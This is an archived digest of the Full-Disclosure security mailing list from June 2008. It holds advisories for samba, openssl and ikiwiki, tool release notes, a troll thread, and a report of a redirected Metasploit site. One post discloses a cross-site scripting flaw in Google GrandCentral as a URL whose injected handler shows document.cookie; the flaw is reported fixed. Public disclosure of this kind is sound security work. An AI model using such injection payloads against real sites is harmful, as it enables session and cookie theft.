Kristian Erik Hermansen | 1 Jun 21:54 2008
Picon

Google GrandCentral XSS 0day


Enjoy...

http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3D&srchinbxtype=&srchcncttype=&search_keywords=
--
Kristian Erik Hermansen
--
"When you share your joys you double them; when you share your sorrows
you halve them."

Kristian Erik Hermansen | 1 Jun 22:00 2008
Picon

Google GrandCentral XSS 0day

Enjoy...

http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3D&srchinbxtype=&srchcncttype=&search_keywords=
--

-- 
Kristian Erik Hermansen
--
"When you share your joys you double them; when you share your sorrows
you halve them."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Andrea Di Pasquale | 2 Jun 01:32 2008
Picon

ARP handler Inspection tool released

ArpON (Arp handler inspectiON) is a portable Arp handler.
It Detects and Blocks all ARP Poisoning/Spoofing attacks with
Static Arp Inspection (SARPI) and Dynamic Arp Inspection (DARPI)
approach on switched/hubbed LAN with/without DHCP protocol.
Important to note, it doesn't compromise the ARP protocol performances.

     I need testing and code revision, thank you.

The link to project's documentation is:
     http://arpon.sourceforge.net/about.html

The link to the project is:
     http://arpon.sourceforge.net

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

rPath Update Announcements | 2 Jun 14:47 2008

rPSA-2008-0180-1 samba samba-client samba-server samba-swat

rPath Security Advisory: 2008-0180-1
Published: 2008-06-02
Products:
    rPath Appliance Platform Linux Service 1
    rPath Linux 1
    rPath Linux 2

Rating: Critical
Exposure Level Classification:
    Remote Root Deterministic Unauthorized Access
Updated Versions:
    samba=conary.rpath.com <at> rpl:1/3.0.30-0.1-1
    samba=conary.rpath.com <at> rpl:2/3.0.30-1-0.1
    samba-client=conary.rpath.com <at> rpl:1/3.0.30-0.1-1
    samba-client=conary.rpath.com <at> rpl:2/3.0.30-1-0.1
    samba-server=conary.rpath.com <at> rpl:1/3.0.30-0.1-1
    samba-server=conary.rpath.com <at> rpl:2/3.0.30-1-0.1
    samba-swat=conary.rpath.com <at> rpl:1/3.0.30-0.1-1
    samba-swat=conary.rpath.com <at> rpl:2/3.0.30-1-0.1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2582

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1105

Description:
    Previous versions of the samba package are vulnerable to an Arbitrary
    Code Execution attack in which a remote attacker may cause a heap-based
    buffer overflow via a maliciously crafted SMB response.
(Continue reading)

Greyhat Security | 2 Jun 18:04 2008
Picon

n3td3v.com

n3td3v Troll,

 

What's $80 to a high-caliber security researcher like yourself?

 

I bet it gets a lot of hits and has the potential to be at the top of the 60,000 google results for n3td3v.

 

How about n3td3vtrolling.com?

 

What about n3td3v.net -- is that your site?

 

All the best,

 

ghsec

 

-----Original Message-----
From: full-disclosure-bounces <at> lists.grok.org.uk [mailto:full-disclosure-bounces <at> lists.grok.org.uk] On Behalf Of n3td3v
Sent: Friday, May 30, 2008 6:36 PM
To: full-disclosure <at> lists.grok.org.uk
Subject: Re: [Full-disclosure] n3td3v.com

 

On Fri, May 30, 2008 at 7:29 AM, Sec Guy <secguy1978 <at> yahoo.com> wrote:

> I just saw n3td3v.com up for sale on sedo...

>

 

> https://sedo.com/search/details.php4?domain=n3td3v.com&tracked=&partnerid=&language=us

>

 

> -SecGuy

>

 

 

No one is going to pay $80 for it, you may as well give it to me for free ;)

 

All the best,

 

n3td3v

 

http://n3td3v.googlepages.com

 

_______________________________________________

Full-Disclosure - We believe in it.

Charter: http://lists.grok.org.uk/full-disclosure-charter.html

Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Kristian Erik Hermansen | 2 Jun 18:49 2008
Picon

Re: Google GrandCentral XSS 0day

On Sun, Jun 1, 2008 at 1:00 PM, Kristian Erik Hermansen
<kristian.hermansen <at> gmail.com> wrote:
> Enjoy...
>
> http://www.grandcentral.com/contacts/search_last_name?search_last_name=%22+onmouseover%3D%22alert(document.cookie)%22+onload%3D&srchinbxtype=&srchcncttype=&search_keywords=

Google has seemingly fixed this 0day in under 12 hours.  Congrats to
our boys at the GOOG...
--

-- 
Kristian Erik Hermansen
--
"When you share your joys you double them; when you share your sorrows
you halve them."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

rPath Update Announcements | 2 Jun 19:09 2008

rPSA-2008-0181-1 openssl openssl-scripts

rPath Security Advisory: 2008-0181-1
Published: 2008-06-02
Products:
    rPath Linux 2

Rating: Minor
Exposure Level Classification:
    Indirect User Deterministic Denial of Service
Updated Versions:
    openssl=conary.rpath.com <at> rpl:2/0.9.8g-6-0.1
    openssl-scripts=conary.rpath.com <at> rpl:2/0.9.8g-6-0.1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2569

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1672

Description:
    Previous versions of the openssl package are vulnerable to a Denial
    of Service attack in which a malicious server may crash clients that
    connect using particular cipher suites.

http://wiki.rpath.com/Advisories:rPSA-2008-0181

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Thijs Kinkhorst | 1 Jun 20:03 2008
Picon

[SECURITY] [DSA 1553-2] New ikiwiki packages fix regression


------------------------------------------------------------------------
Debian Security Advisory DSA-1553-2                  security <at> debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
June 01, 2008                         http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : ikiwiki
Vulnerability  : cross-site request forgery
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-0165
Debian Bug     : 475445

The update of ikiwiki in DSA-1553-1 caused two regressions. An updated
version of ikiwiki is available that fixes these problems. For reference,
the full advisory text is below.

It has been discovered that ikiwiki, a Wiki implementation, does not
guard password and content changes against cross-site request forgery
(CSRF) attacks.

For the stable distribution (etch), this problem has been fixed in
version 1.33.6.

For the unstable distribution (sid), this problem has been fixed in
version 2.42.

We recommend that you upgrade your ikiwiki package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_1.33.6.tar.gz
    Size/MD5 checksum:   227416 015972590255cf03068b9446c733254f
  http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_1.33.6.dsc
    Size/MD5 checksum:     1015 f833af1b001adf3ac2bea69dfe2aeead

Architecture independent packages:

  http://security.debian.org/pool/updates/main/i/ikiwiki/ikiwiki_1.33.6_all.deb
    Size/MD5 checksum:   278396 f2f82d9f70008b403a952c12e02095b8

  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce <at> lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
Nicolas Waisman | 2 Jun 15:50 2008

Immunity Debugger 1.6 is out!


Immunity, Inc. proudly presents: IMMUNITY DEBUGGER 1.6

This release we are introducing the most requested feature since the
release of ID 1.0 in the form of automatic symbol downloading.

In the script department we included two awesome new scripts: tredll and
findloop. Yes, you read that correctly, we have implemented dominator
trees for your coverage analysis pleasure and you are now able to detect
loops inside functions.

Immunity Debugger 1.6 delivers more stability and fixes a lot of known
issues. For example the old AddKnowledge/PostAnalysis bug is gone and
the land of hooking is all happiness. Check the Changelog below for more
details.

Download it now: http://debugger.immunityinc.com/

For the next release we are working on variables and structure, so stay
tuned!

The Immunity ID Team

--------------
1.60 Build 0

New Features:

Debugger
  o Added 'Use Symbol Server' option
   [http://forum.immunityinc.com/index.php?topic=162]
  o Improved Getallnames
  o Added timestamp to log events

Immunity Debugger API
  o Added getAllSymbolsFromModule method
  o Added libcontrolflow.py
    Container for classes DominatorTree and ControlFlowAnalysis
  o Added Clear function to FastLogHook.

PyCommands
  o Added findloop.py: Find natural loops given a function start.
  o Added treedll.py: Creates imported dll tree.

Bug Fixes:
  o Fixed POST_ANALYSIS_HOOK "FATAL ERROR"
  o Fixed Arguments overflow (Thanks David Wetson for reporting this one!)
  o Local Symbol Path issue
  o Analysis second pass option now works
  o Getallsymbols now correctly creates the PyDict
[Import/Export/Library issue]
Jacques Erasmus | 2 Jun 17:40 2008

Metasploit - Hack ?

Seems like the metasploit site has been hacked.

 

http://forum.eviloctal.com/redirect.php?tid=33254&goto=lastpost#lastpost

 

The links such as http://www.metasploit.com/framework etc are rediring to the above site – is anyone else seeing this ?

 

 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Gmane